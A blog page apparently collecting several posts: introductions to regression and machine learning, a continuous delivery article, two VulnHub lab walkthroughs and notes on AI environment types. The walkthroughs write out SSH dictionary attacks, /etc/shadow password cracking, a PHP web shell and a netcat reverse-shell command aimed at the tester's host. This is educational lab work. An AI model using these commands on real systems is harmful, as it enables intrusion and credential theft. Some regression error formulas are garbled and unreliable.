IA (III): Regression

Regression is one of the technices we can find in the supervised learning paradigm.

Let’s suppose we have some historic data about some alcohol effects trials participants, and we have some data about the amount of alcohol they have ingested before showing symptoms of drunkenness. In addition, we have some data about themselves like weight and height.

Now, we want to explore how I would use machine learning to predict how many alcohol can a person ingest before getting drunk.

When we need to predict a numeric value, like an amount of money or a temperature or, in this case, the number of mililiters, in this cases is when a supervised learning technique called regression is used.

Let’s take one of the participants in our study and check the data is interesting for us. And, let’s make it simple and take just age, weight, height and percentage of body fat.

What we want to, it is to find a model that can calculate the amount of alcohol a person can drink before to have symptoms of drunkenness.

Age: 30. Weight: 90 kg. Height: 180 cm. Body fat: 23%. Alcohol: 125 ml.

ƒ([30, 90, 180, 23]) = 125

So we need our algorithm to learn the function that operates of all of the participant features to give us a result of amount of alcohol in milimiters.

Of course, a sample of only one person is not likely to give us a function that generalizes well. We need to gather the same sort of data from lots of diverse participants and train our model based on this larger set of data.

ƒ([X1, X2, X3, X4]) = Y

After we have trained the model and we have a generalized function that can be used to calculate our label Y, we can then plot the values of Y, calculated for specific features of X values on a chart. And, we can interpolate any new values of X to predict and unknown Y.

Captura de pantalla 2018-06-16 a las 11.37.00

We can use part of our study data to train the model and withhold the rest of the data for evaluating model performance.

Now we can use the model to predict f of x for evaluation data, and compare the predictions or scored labels to the actual labels that we know to be true.

The result can have differences between the predicted and actual levels, these are what we call the residuals and they can tell us something about the level of error in the model.

Captura de pantalla 2018-06-16 a las 11.18.51

There are a few ways we can measure the error in the model, and these include root-mean-square error, or RMSE, and mean absolute error, or MAE. Both of these are absolute measures of error in the model.

RMSE = √(∑(score – label)^2)

MAE = 1/n ∑ abs(score – label)

For example, an RMSE value of 5 would mean that the standard deviation of error from our test error is 5 mililiters.

The problem is that absolute values can vary wildly depending on what you are predicting. An error of 5 in one model can mean nothing but in a different model can be a big difference. So we might want to evaluate the model using relative metrics to indicate a more general level of error as a relative value between 0 and 1.

Relative absolute error, or RAE, and relative squared error, or RSE, produce a metric where the closer to 0 the error, the better the model

RAE = ∑ abs(score – label) / ∑ label

MAE = √(∑ (score – label)^2) / ∑ label^2

And the coefficient of determination, which we sometimes call R squared, is another relative metric, but this time a value closer to 1 indicates a good fit for the model.

CoD (R^2) = 1 var(score – label) / var(label)

Advertisements
IA (III): Regression

AI (I): Machine learning

Machine learning provides de foundation for artificial intelligence. So, what is it?

Machine learning is a technique in which we train a software model using data. The model learns from the training cases and then, we can use the trained model to make predictions for new data cases. To have a computer make intelligent predictions from the data, we just need a way to train it to perform the correct calculations.

We usually start with a data set that contains historical records, often called cases or observations. Each observation includes numeric features that quantify a characteristic of the item we are working with. We can call it ‘X’. In addition, we also have some value that we are trying to predict, we can call it ‘Y’. The purpose is to use our training cases to train a machine learning model so it can calculate a value for ‘Y’ from the features in ‘X’. As a simplification, we are creating a function that operates on a set of features ‘X’, to produce predictions ‘Y’.

Generally speaking, there are two broad kinds of machine learning, supervised and unsupervised.

In supervised learning scenarios, we start with observations called labels, that include known values for the variable we want to predict. The first thing we need to do, it is to split our data because we already know the label we are trying to predict. In this way, we can train the model using half of the data and keep the rest to test the performance of our model. When we obtain the desired results and we are confident our model works, we can use it with new observations for which the label is unknown, and generate new predicted values.

Unsupervised learning is different from supervised learning, in that this time we do not have known label values in the training data set. We train the model by finding similarities between the observations. After the model is trained, each new observation is assigned to the cluster of observations with the most similar characteristics.

AI (I): Machine learning

CD: Continuous Delivery

Nowadays, our development teams use Agile methodologies what means that we have accelerate our processes trying to deliver small chunks of functionalities to receive early and real feedback from users to continue iterating our ideas.

Now, we are an organization that follow and use Continuous Integration practices but, we are still missing something. We are not able to receive this feedback if it takes ages between our developers finishing their tasks and the code been deployed in to production where our users can use it. In addition, when a lot of changes or features are delivered at the same time, it makes more difficult to debug bugs on solve possible errors. For a long time, the deployment process has been seen as a risky process that requires a lot of preparation but, this needs to change if we want to be truly Agile.

Here it comes Continuous Delivery (CD). Continuous Delivery is a practice that tries to make tracking and deploying software trivial. The goal is to ship changes to our users early and often, multiple times a day if possible, to help us minimize the risk of releasing, and giving our developers the opportunity to get feedback as soon as possible.

As I have said before, we should have already a Continuous Integration environment to ensure that all changes pushed to the main repository are tested and ready to be deployed. Can it be done without a CI environment? Yes, probably, but more probably we are going to create a machine that it is just going to push our bugs faster to production increasing our risks.

Steps we need to take

Create a continuous delivery pipeline

The continuous delivery pipeline is a list of steps that happen every time our code changes till it finds its way to production. It includes building and testing the application as part of the CI process and extends it with the ability to deploy to and test staging and production environments.

With this we will achieve two things:

  • Our code will be always ready to be deployed to production.
  • Releasing changes will be as simple as clicking a button.

Create a staging environment

All of us, generally, have been writing code in some point in our lives, some of us still do it, some of us have evolve our careers but, something that I am sure all of us remember are these cases of “it worked on my machine…”. Configurations, differences in environments, networks… There are thousands of things that can be different and can go wrong, and probably it will go. No matter how many test we have locally, how many precautions we take, our local conditions are not going to be the same than our production conditions. For this reason we need an intermediate environment, the “staging” environment.

The “staging” environment does not need to support the same scale as our production environment but it should be as close as possible to the production configuration to ensure that the software is tested in similar conditions.

The “staging” environment should allow us to see things before it happen. If something is going to break, it should break in this environment. Using this environment, our release workflow should be similar to:

  1. Developers build and test locally a feature.
  2. Developers push their changes to the main repository where CI tests run automatically against their commits.
  3. If the build is green, the changes are released to the staging environment.
  4. Acceptance tests are run against the staging environments to make sure nothing is broken.
  5. Changes are now ready to be deployed to production.

An additional advantage is that it allows our QA team and product owners to verify the software works as intended before releasing to our users, and without requiring a special deployment or access to a local developer machine.

Automate our deployment

Or, we need to create a “green button” that once it has been pressed, without any other human intervention is going to deploy our code in staging or production.

We can start building some scripts that we run from our development machines and, after that, we can add them to a any CI platform.

There are many ways to deploy software, but there are common rules that maybe we can use as guidance:

  • Version the deployment scripts with our code. That way we will be able to audit changes to our deployment configuration easily if necessary.
  • Do not store passwords in our script. Instead, use environment variables that can be set before launching the deployment script.
  • Use SSH keys when possible to access the deployment servers. They will allow us to connect to our servers without providing a password and will resist a brute force attack.
  • Make sure that any build tools involved in the pipeline does not prompt for user input. Use a non-interactive mode or provide an option to automatically assume yes when installing dependencies.
  • Test it, test it and test it again. Make sure everything deploys as expected, that nothing is missing no matter what kind of changes you are doing.
  • Maybe, it is a good moment to write some smoke test, if you do not have it, to check if your machines are up an running.

Include data structure changes

Let’s face it, when our application changes the code is not the only thing changing. The data structures change too. And, we are not going to have a CD environment if this changes are not added to our automatic deployments.

First, create backups. No matter how good we are, how little is the change, something is going to fail in some point and we want to be able to restore the previous state of the application.

Second, there are multiple tool that can help manage data structure changes as code. Some frameworks bring their own to the table but, if not, we can find tools that fit our technologies and ideas. Just learn them and use them.

All together and the last detail, the CI server

Arriving here, we have set a CI environment with a CI server and we have a “button” to run our deployments, now, why not put everything together?

To do this, we just need to add a manual step in our pipeline to release (press the button) the code to our different environments.

Now, every time our code is merged and ready to production, following business needs, we just need to push the button and release. This give us a great control of our deployments. The only precaution we need to take is not to leave to many commits accumulated.

CD: Continuous Delivery

WALKTHROUGH: De-ICE: S1.100

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.

Information

https://www.vulnhub.com/entry/de-ice-s1100,8/

Scenario

The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Configuration

PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of 192.168.1.100 – no additional configuration is necessary.

Download

ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command, but in this case is going to fail, or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.1.0/24
01-netdiscover
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. We can see a brief explanation about the challenge and not much more than that. But, we can see a very important thing here. Reading carefully the page we can see there are some email related with the company.

Head of HR: Marie Mary - marym@herot.net (On Emergency Leave) 
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr. System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net

We should pay special attention to the last three because they are admin users.

This gives us a few information:

  • Names of people that is working in the company.
  • Valid emails.
  • Examples of how they are creating usernames.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.1.100
02-nmap
Figure 2. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service. And, something is not right here.
  • 22 SSH service
  • 25 SMTP service
  • 80 HTTP service
  • 110 POP3 service
  • 143 IMAP service

Considering we do not have any other information, we need to start thinking in what we are missing. We already have some valid email, with this information we can create a list of possible users in the system. In addition, we can add users like “root” or “admin” or similar users that are always useful to have. In this case, our list can be something like:

root
admin
aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech chad.coffee

Now, that we have a list of possible users, we can try to connect to the SSH service. For this, we are going to use the tool “medusa” trying to do a dictionary attack to see if we are lucky.

medusa -h 192.168.1.100 -U users.txt -P passwds.txt -M ssh -v 4 -w 0
03-medusa
Figure 3. medusa result

As we can see, we have been able to break one password. Let’s use it and try to connect using SSH.

ssh aadams@192.168.1.100
04-ssh
Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l
05-sudo
Figure 5: Available tools

We can see we can use the tool “cat” to read file content. Then, let’s check the files “/etc/passwd” and “/etc/shadow”.

06-cat_shadow
Figure 6: /etc/shadow content

With a simple copy and paste we can move the content of both files to our machine to try to use “John” to discover new passwords, specially the “root” password. After the copies are done, we can “unshadow” the files to have everything in one file.

unshadow pasad_file.txt shadow_file.txt > root_password.txt

 

07-unshadow
Figure 7. unshadowing the passwd and shadow files

Trying to save a little bit of time, and because we already have an operative user “aadams” we can copy the “root” credential to a file and try to break just the “root” password.

john just_root.txt
08-john
Figure 8. John results

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@192.168.1.100
09-no_root_ssh
Figure 9. SSH connection as “root” failing

As we can see, we are not able to connect as “root” user using SSH. But, we are still having the “root” password and a valid user “aadams”. Let’s try to login as “root” using our valid user

10-aadams_root
Figure 10: We are root!

Usually, now that we are root we can close the case and deliver our report, but going around a little bit we can find an interesting file, and considering this is a training exercise, we can play a bit more. The file is this one

11-found_file
Figure 11. Curious file
12-encripted_file
Figure 12. encripted file, maybe
bin walk salary_dec2003.csv.enc
15-binwalk
Figure 13. confirming is an excerpted file

What do we know about the file:

  • It is encrypted with OpenSSL.
  • It was in a folder only accessible by the “root” user. We can think that maybe it is going to be encrypted using the “root” password we have.
  • We know that we do not know the type of cipher.

We can check the type of ciphers that OpenSSL offers.

openssl enc help
18-ciphers
Figure 14. Available ciphers

Let’s try on of them out of curiosity to see how an error looks like, and after that, let’s try to figure out how to try/apply all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
16-decripting_file
Figure 15. decripting file

I guess that it is because it is just a training environment but the one that does the job is the first one. No more attempts are needed. In the real world probably we should write a script to test all the cipher available.

17-files_content
Figure 16. File decrypted

With this our scenario finish. We have access to the machine, we have root permissions and we have decrypted the “salary” file, our job is done. It has been interesting but I thing that it is just possible because the passwords where not very strong.

 

WALKTHROUGH: De-ICE: S1.100

Walkthrough: 21LTR: Scene 1

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.

Information

https://www.vulnhub.com/entry/21ltr-scene-1,3/

Scene 1

Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com

Scope Statement

The client has defined a set of limitations for the pentest: – All tests will be restricted to the systems identified on the 192.168.2.0/24 network. – All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report – A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.

Configuration

Scenario Pentest Lab Scene 1:

This LiveCD is configured with an IP address of 192.168.2.120 – no additional configuration is necessary.

Download

ISO image

Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.2.0/24
001-netdiscover
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. In this case the web page give us a few information and nothing interesting but, the source code os the page give us the first good information. As a comment in the page, we can find some credentials

login_pass_in_source_code
Figure 2. Credentials found in the source code

There is nothing else to do here but to be sure we are not missing some pages or folders let’s run a different tools against the web page to check it. The tool is going to be “dirb”

dirb http://192.168.2.120
005-dirb.png
Figure 3. dirb results

We can see that a couple of folders have been found, but the only one that seems to respond in the browser is the “/logs”. Unfortunately, returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.2.120
002-nmap.png
Figure 4. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service
  • 22: SSH service
  • 80: HTTP service
  • 10001: In this point, I am not sure what is this. In addition, it does not show always in the scanner results.

Considering we have some credential, lets try to connect to the different services. There is no luck with the SSH access but the FTP allows us to connect and try to explore. Unfortunately, we can just file one file.

003-ftp_connection.png
Figure 5. FTP exploration results

Considering we have found a folder “/logs” previously and we have found a file called “backup_log.php”, one good idea is to try the URL we can build with them.

http://192.168.2.120/logs/backup_log.php

004-browser
Figure 6. Page content

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.

 

At this point, I must recognize that I was a bit lost and running out of ideas, then, in the meantime I went for a walk I left the “Wireshark” tools running. Why? Because both are good ideas, go for a walk when you are block and because you never know what you can find in the network. After taking a look to the traffic I saw some (a lot) calls asking for the IP address “192.168.2.240”.

006-wireshark
Figure 7. Wireshark results

At this point, I decided to change the IP of my testing machine to this address and turn on again the “Wireshark” to see what happen and, I have one interesting event. Apparently the training machine wants to establish a connection with “192.168.2.240” (my machine now) with the port 10000.

007-wireshark2
Figure 8. Wireshark results

Then, lets allow this connection to see what happen. To allow this, let’s execute “necat” and wait again.

nc -lvvp 10000 > output

Here wee can see the connection is done in some point and we have what it looks like a binary file called “output”. After a some investigation, we can see it is a “tar.gz” file (using exiftool) and we cannot find anything interesting in the file, but it is clear that it is a backup file.

008-wireshark3
Figure 9. Wireshark result
exiftool --list output
exif
Figure 10. exiftool result
014-downloaded file
Figure 11. Exploring backup file

Linking that in the “nmap” there is a port 10001 we do not know what it is, we have in the server a page that shows backup result messages and that we are obviously downloading a backup file, we can infer that maybe the port 10001 just open when its waiting for a response about the sent backup. To test this theory, let’s try to connect to the port 10001 when the backup is sent. Because we do not know when it is going to be send, let’s just try to connect multiple times.

while true; do nc -v 192.168.2.120 10001 && break; sleep 1; clear; done

After a few minutes, the connection is stablished and we can type a few instructions.

009-wireshark4
Figure 12. Wireshark results

Apparently, they are doing nothing but, when we go again to the backup log messages pages we can see what we have been typing.

010-browser
Figure 13. Messages typed

Then, let’s try to type something that allow us to do something useful and to have access to the training machine. Let’s try to inject a PHP on-line webcell:

<?php echo exec($_GET["cmd"]);?>

And type something to check if it is working.

curl --silent 192.168.2.120/logs/backup_log.php?cmd=id
011-curl to cmd.png
Figure 14. Connection result

As we can see (end of the image) we are connected as “apache” to the training machine. Now, let’s try to have a proper shell where to execute command and take a look properly to the system. We are going to a port in our system and try to connect with a shell process from the training machine.

nc -lvvp 443
curl --silent 192.168.2.120/logs/backup_log.php?cmd=/usr/bin/nc%20192.168.2.240%20443%20-e%20/bin/sh #

And, success, we have our shell.

012-remote conexion
Figure 15. Shell in the training machine

The next step it is to try to find the credential files and see their content but, unfortunately, we can just list the file “/etc/passwd” and the credentials are (I guess) in “/etc/shadow” that I cannot list.

Our next step is going around the machine to see what we can find. In this case, after some exploration, we can find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

  • authorized_keys: With the key of the authorized users to connect with SSH. In this case “hbeale”
  • id_rsa: The private key to connect to SSH
015-user_for_ssh
Figure 16. User with SSH access
016-private_key
Figure 17. Private key

Coping the key to our system we can try to connect.

ssh hbeale@192.168.2.120
017-ssh_to_remote
Figure 18. SSH access

Checking what command we can execute as “sudo”. We can see we can use the tools “cat” to read file content.

sudo -l
018-available_no_pass
Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.

019-etc_shadow
Figure 20. /etc/shadow content

Here we can see the hash for the “root” user and copy it to a file in our system (root_password). Let’s try to increase our privileges cracking the hash with “John” (the tools John) and using one of the dictionaries that comes with Kali.

john --wordlist=rockyou.txt root_password
020-john_root
Figure 21. John’s execution

We are lucky, John has done its job properly and we have the password “formula1”. Let’s try it.

021-root
Figure 22. We are root!

With this our scenario finish. We have access to the machine and we have root permissions, our job is done. It has been funny and frustrating but I do not thing there would be the first one without the second one.

Walkthrough: 21LTR: Scene 1

Artificial Intelligence: Type of environments

Let’s first describe what is an agent in artificial intelligence. An intelligent agent is an autonomous entity which observes through sensors and acts upon an environment using actuators and directs its activity towards achieving goals. Intelligent agents may also learn or use knowledge to achieve their goals. They may be very simple or very complex.

When designing artificial intelligence solutions we need to consider aspects such as the the characteristics of the data (classified, unclassified, …), the nature of learning algorithms (supervised, unsupervised, …) and the nature of the environment on which the AI solution operates. We tend to spend big amounts of time in the first two aspects but it turns out, that the characteristics of the environment are one of the absolutely key elements to determine the right models for an AI solution. Understanding the characteristics of the environment is one of the first tasks that we need to do. From this point of view we can consider several categories.

Fully vs Partial observable

An environment is called fully observable if what your agent can sense at any point in time is completely sufficient to make an optimal decision. For example, we can imagina a card game where all the cards are on the table, the momentary site of all those cards is really sufficient to make an optimal choice.

An environment is called partialy observable where you need memory on the side of the agent to make the best possible decision. For example, in the poker game the cards are not openly on the table, and memorizing past moves will help you make a better decision.

Deterministic vs Stochastic

A deterministic environment is one where your agent’s actions uniquely detemine the outcome. For example, in the chess game there is really no randomness when you move a piece, the effect of moving a piece is completely predetermined and, no matter where I am going to move the same piece, the outcome is the same.

A stochastic enviroments there is a certain amount of radomness involved. Games that involve a dice, are stochastic. While you can still deterministically move your pieces, the outcome of an action also involves throwing the dice, and you cannot predict it.

Discrete vs Continuous

A discrete environment is one where you have finitely many action choices, and finitely many things you can sense. For example, the chess has finitely many board positions and finately many things you can do.

A continuous environment is one where the space of possible actions or things you could sense may be infinite. In the game of dards, throwing a dard we have infinite ways to angle it and accelerate it.

Benign vs Adversarial

In benign environments, the environment might be random, it might be stochastic, but it has no objective on its own that would contradict the own objective. Weather is benign, it might be ramdon, it might affect the outcome of your actions but it is not really out there to get you.

In adversarial environemnts, the opponent is really out to get you. In the game of chess the enviroment has the goal of defeat you. Obviously, it is much harder to find good actions in adversarial environments where the opponent actively observes you and counteracts what you are trying to achieve than in benign environments.

I have seen a few more classifications or specifications but, more or less, all of them list the same categories or very similar categories.

Note: Article based on my notes of the course Intro to Artificial Intelligence | Udacity

Artificial Intelligence: Type of environments